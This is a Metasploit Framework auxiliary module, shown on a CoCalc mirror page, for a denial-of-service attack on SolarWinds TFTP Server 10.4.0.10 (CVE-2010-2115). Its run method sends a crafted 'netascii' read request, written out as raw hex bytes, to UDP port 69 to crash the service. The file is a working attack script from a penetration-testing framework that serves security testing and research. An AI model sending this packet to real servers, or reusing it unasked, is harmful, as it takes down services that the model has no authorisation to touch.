Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/dos/windows/tftp/solarwinds.rb
21549 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Auxiliary
7
include Msf::Exploit::Remote::Udp
8
include Msf::Auxiliary::Dos
9
10
def initialize(info = {})
11
super(
12
update_info(
13
info,
14
'Name' => 'SolarWinds TFTP Server 10.4.0.10 Denial of Service',
15
'Description' => %q{
16
The SolarWinds TFTP server can be shut down by sending a 'netascii' read
17
request with a specially crafted file name.
18
},
19
'Author' => 'Nullthreat',
20
'License' => MSF_LICENSE,
21
'References' => [
22
[ 'CVE', '2010-2115' ],
23
[ 'OSVDB', '64845' ],
24
[ 'EDB', '12683' ]
25
],
26
'DisclosureDate' => '2010-05-21',
27
'Notes' => {
28
'Stability' => [CRASH_SERVICE_DOWN],
29
'SideEffects' => [],
30
'Reliability' => []
31
}
32
)
33
)
34
35
register_options([
36
Opt::RPORT(69)
37
])
38
end
39
40
def run
41
connect_udp
42
print_status('Sending Crash request...')
43
udp_sock.put("\x00\x01\x01\x00\x6e\x65\x74\x61\x73\x63\x69\x69\x00")
44
disconnect_udp
45
end
46
end
47
48